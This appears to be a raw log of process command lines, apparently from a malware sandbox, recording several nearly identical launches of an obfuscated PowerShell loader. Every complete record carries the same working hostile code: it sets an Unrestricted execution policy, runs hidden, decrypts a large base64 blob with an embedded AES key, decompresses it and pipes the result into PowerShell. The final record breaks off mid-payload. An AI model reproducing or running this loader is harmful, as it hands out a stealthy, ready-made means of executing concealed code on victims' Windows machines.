cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $czJl = '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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG \| powershell - }
cmdline	powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $czJl = '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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG \| powershell - }
cmdline	powershell -
cmdline	C:\Windows\System32\cmd.exe /c powershell.exe $czJl = 'AAAAAAAAAAAAAAAAAAAAAI/qR6Qo+tei6M2ZAL5aETbauJv4e0Z5t3z1uC9ud0jKjvIYyApg827M8IEYlnMkcrVOj4liYnaMiTZzMn1qXT08YYK7IM8JB29pYJgIM5XlJ0S2yPsO7Hn4SIT738/EImNcjOHzN5qSYzkU3oJQKn5VoZLpsd0etc/qgLwIShRMrYah7eOtDD90TEo/sQUb/4qG1UyzfrPEnEhNiodPv2UZDGW0w2aMsGrF8EoHiyNBLV2tyqGdoY4NBEfbjB151RdoGvtaocKX9plmeoOtqSiQyDuVt5ulS93uMYYyqc51yq26WTECSSUNbdVtMq7IXadWiS1yQP1e/qDT/go/c5G1At1XYqCP1//ThFM4kVpWRg9eGq5k6Lp59tCYVBx96xSGlsgFN/A9cCwsEeNwRmH6iNR2Flab0lQrz3Uut4SX/r/4lkfm7TC2Rp4bNbE4obVZ43EDTjrZICq0gUTXl76tG+5jxyoFrp5bX3M04tir4LIy2GaqcBD2XGWN6Su1XWUc/cxYO5lrB+tf0iATixZsYb9NQu/G/RdKwoFp3gm8xXbaiOeQp8GukSwsH2BRtW7EGCGcwgvPqlwEEiH6nF6v1are+75y1bOxgoGdmVEHO02NQMQGqIBZbBggMtTQ1HZBKuD7cCW968cJV67QBefrwuHm9+Ys9OgX8vHHx8nFLJclw+zT6SKH2l4lQyhx66iBZ1d94g1xXwe1wRukzJN0CWiIg97FmIRNaVXwFqMA1dvi8mkmP2xD2+1ACx9asVnsx9lSJNIinkXnoBW1K5u9DaJ2aSA6oM5Fk/Zb2yCgqN2S7QNyjb7wdAxgJe/EsW7ULK7kl6fZMbRBrlZ4zcp1W6Dx0H4ENZJdHT05oR6zRwGo7DIYKLAsBhl0umLIlw+fMdtAxdcvnAGDE2cNv1qjRelOCwMKOtQNAi2PxiKQ6XuDFGvGkwNBbwqfTPsBSR+aKrBdqgoLIMYIDzoQXgFC6AlIGQBM2lerjWZe+vUH7jaXe068aJASoPAazELAnwtP4fC0mjFbrXlD4yGUwWnCV1NY6YhpDFwPK6I5u+R/4qZPz7Yn9TkFfqTykYc3oWknjge106xxCNtjur/Dytp1VbUDNdTDBS2piV0XpiDaqf+G6UlYy5/Vad2wahouzjsLuVgUpOxMYK2Oz+s2VuvCUs2urIThOXZAAiq9Z4VnA8HbmCifp08UmITK0MrIAGAu2VRoho17rCi2+yzDaTIQraJ0ZMoBbWseQEym6I3V6zuVjOvKOCfMbODXEbvuwnrEQdB1GRRdTVvYgBP7vOAjSdW97bKCNhYKWLzKIARtKT4oWcuYLMGHDvhABCmDUOOFvHoKus3j5RZExdjaVBCfjrFHrUkNq6+bl2eN7sxpsE72dg/eJGzYamnhpmN7jNvDdDS8u3dePXBTJoKrp/3Wkk7UbENzPzcGexdPbCxqEkmrt/pLvnJTFX0CVa7mizCOPLEv2V9W/y0e2q5YgpT7Ro8x5f5PV3cAm3liwCKvg8KwIUuzIMaSzNmC1H1hoRMRHf4TyVCRqIr9MoRQORb/GCZeR8QQFw1OUekRN80DUu6s5DDI1CvJhvryer0wXIM1K0WnIZOe2sBqOpjzjeGGo5HU9EjWjXq5/YQJWYVcNeMSz6f9JnUmZtXcV2frbBU7D2SlBDXeIuvibv51e4rkxrvM2rmMXLvsbY7Zb5KcGcpgnGavjVKkvsp24+vXDYSM++am4eN2qkfkhl7zrOO5LlIXDflN4t1eaAaH1FmiL84Df/4EPnb6RKx34uiEGpc5QiYx13ZGaPxkvx9B3prlEQilcgn1eoxKqS4iofitJSW2jlVrUdytxNuIz6HsmzboNiKDzpqjGC/ZLrzQAMjazkKIUMes15acNIgBV0sQWCB5TNvAkvVeyAwMXx7ufs8oHsbwcSUI54hQZMZC2acERYp7lgWV7nz5ipp1Bvg2aPjALI6/C1MQAzxNLgXJWowWriHAyFbbPU2mgO1nIOONmt09QbfHAUTnwIOjK3ZNLqHWxuEYuEaIOtQbN5Sfr7QgZ6UF4QeNEkzgaebL3JIiqEPXtS9DkhPpJ0r25FNl9842XeOES6cED7Zju/lJQMQA81sinTpngGN2uXmJGLCTI5nNsvV8ul7C00NGm8cTFChmAUwPAtMiaANf6pHAVyiCmiH6uqgFf9FcLY/VKVcepcleZLZs79IWJzElCrkVf0DZqvPYLyJgfbni/looKRE1g4gpDFjGMu7dL+KpREXHe/q07OndctU+EIKK+ia8Hq3ATKhk12uC8V/8tlDeNFfI0gODd6pTPy2y97DLl5E431pF6JVfZfAExWE8atZuwAQ0O70124s8kdRuRQ2PekXSlO01LNCVKtfFmEpBbz+BZ9Psgodx44CbD67PHXoaK7bkm0VkrN8W+f1aGkr2kQQ93PXaiaAocYgqpBF7tTTaz2qOu0+sKkhSSYgmFXwqCV9d2sLz2D7FLPRzkjOsb1YQcW+E3vncNvWUzOOHBx8QX45PDkhVMtCfeAs5yy0VnCygQxo30DsrBNnVS0+Ed0WHO9/gvYDLdm2fuOEZ6jf+7NOH9ikGegSRoZVpVTsrecrccgaFsZBXlqZOXBeoCATFmIePE5ZS0fSjXPZ1cX1N95UuOpueTESHvfgvghi+EGsJuP7w8WZHaGaiSNz3uDYNMznombCvH0MOttfo6ZH6pEIdpC0b2VR/aRO4xUiwPJwbNhQKJG2aAZASBOvXqB/yyjr/lgI9P7OpmTOTuNkX1PirZOCRXhV15Y7iKZVyVH9BuYE3yfyTqh2FirNVG44AKRVVtQyjY8hFghorYNpEDtBW5M48BJHgp/kGDK103MA1gpxURYWDesSO1ngs7UPhpBzd4KgDe0/M7c6r7+/A3RymIjmLFGsb9ssxItoctYx0KgQgN/gTMlyJ1l3uy/lRwqpV5RGTrYmOua9jg1TK0EQZztXthH1+lcNiGk8CnpdSpbNR5bTSzdVvu8C/LdM0IzA0+0b3TNNieyIdJPSdQj7eumvd6KsIT6NEMYrNnQ8NWW+Th9uQ2mCfxQzjmsHZP+pPl2R6TLxcCBQ31PvGBz3+Z0MPDP3YudqzqmtA5uiuuZAuOWRae63RJpLtFqAKK2CAS70x+LMIzgX5mHb5e/HBcJTT5lYuyyehgmAYvUEp7tzBiGXz0yziRHmwN9gkRcm/42C8QaguP+I217vsHER/jZOH/Cb6LeQTPXJclXbBi7DD+6Vd5M487qZyzPL9N9gCktFwyvYZIZyBGYH/rPFCwScBD36BinpLmOp7SuA9QQm/XfWxjRvWO8KN9OL21izaDyKLA1xnRF3roThMHg7Co19pTT7B8xQ2bumuP70rOGoZI+mNy6MncK4r1DW5Ct9uQPAwVNf2XW+qeY5T7kRhQq5QoBOX5lM6DPk6v7PKwFPJYzkEpVhjJ2tE7YS5LMJ9jJfTTdxA4SRvJvJkr4GB3KdeGvSsPDv7sR6FZoZ0ejg0eGsU3JeN7rm3pG+Y3gqVeNWDKUp5BehNAqp+QByozRbYdR0pbgmEMalLOgsRz0AOFbrmqZjZ9oyXO5Pcb7+em+7UtlX24jHRws6NV9lFRwFi8catLcm9ZWZrhsAY9bIi2WDaFfAjIvT8iynAt+3pXnmogEphPG8zLk+dQvFIpU39m30arG/OZ5ms66QMczLjeX/r41o0KT5z7PO3EK/Bym6SsT0rYwHjnT0wuIp0lM3fqH85KuNQ6OC6kWO/HuJDB7+oPqTAg+P1OfSh1IROLRt6uPLjz4fcKph5Nb30xH7SjDHahdStmpoaQCt++BGcQMbX89tZo7w8NFIqBLQeOyVtJNRQvxbKA5hORWN9ARRdwHWeB2I78X/Qzx3EVozaJDBh7za9UY+0+DEqJ1nFoiN+sfEytGepOpKz2A76ymbCWznZCcLrGlyd1C01h7r+Jd4mZp8qVGfLU5fe+7VRPNPs5le9qmSM4cKP5sBe4DhZGZ60DrC6oOTWFLa172ymLasXyxfASMMEXZ4iWXr59lwjqPirFMahDCwi1jbcOQ9b5aGBMlJZIGdeEDJvOwz66ZeXH6MRIy8WvsegJaWb3V8NLequguv3DsLi5Jh6aSv2cnufbeIKbpMr';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG \| powershell -
cmdline	powershell.exe $czJl = 'AAAAAAAAAAAAAAAAAAAAAI/qR6Qo+tei6M2ZAL5aETbauJv4e0Z5t3z1uC9ud0jKjvIYyApg827M8IEYlnMkcrVOj4liYnaMiTZzMn1qXT08YYK7IM8JB29pYJgIM5XlJ0S2yPsO7Hn4SIT738/EImNcjOHzN5qSYzkU3oJQKn5VoZLpsd0etc/qgLwIShRMrYah7eOtDD90TEo/sQUb/4qG1UyzfrPEnEhNiodPv2UZDGW0w2aMsGrF8EoHiyNBLV2tyqGdoY4NBEfbjB151RdoGvtaocKX9plmeoOtqSiQyDuVt5ulS93uMYYyqc51yq26WTECSSUNbdVtMq7IXadWiS1yQP1e/qDT/go/c5G1At1XYqCP1//ThFM4kVpWRg9eGq5k6Lp59tCYVBx96xSGlsgFN/A9cCwsEeNwRmH6iNR2Flab0lQrz3Uut4SX/r/4lkfm7TC2Rp4bNbE4obVZ43EDTjrZICq0gUTXl76tG+5jxyoFrp5bX3M04tir4LIy2GaqcBD2XGWN6Su1XWUc/cxYO5lrB+tf0iATixZsYb9NQu/G/RdKwoFp3gm8xXbaiOeQp8GukSwsH2BRtW7EGCGcwgvPqlwEEiH6nF6v1are+75y1bOxgoGdmVEHO02NQMQGqIBZbBggMtTQ1HZBKuD7cCW968cJV67QBefrwuHm9+Ys9OgX8vHHx8nFLJclw+zT6SKH2l4lQyhx66iBZ1d94g1xXwe1wRukzJN0CWiIg97FmIRNaVXwFqMA1dvi8mkmP2xD2+1ACx9asVnsx9lSJNIinkXnoBW1K5u9DaJ2aSA6oM5Fk/Zb2yCgqN2S7QNyjb7wdAxgJe/EsW7ULK7kl6fZMbRBrlZ4zcp1W6Dx0H4ENZJdHT05oR6zRwGo7DIYKLAsBhl0umLIlw+fMdtAxdcvnAGDE2cNv1qjRelOCwMKOtQNAi2PxiKQ6XuDFGvGkwNBbwqfTPsBSR+aKrBdqgoLIMYIDzoQXgFC6AlIGQBM2lerjWZe+vUH7jaXe068aJASoPAazEL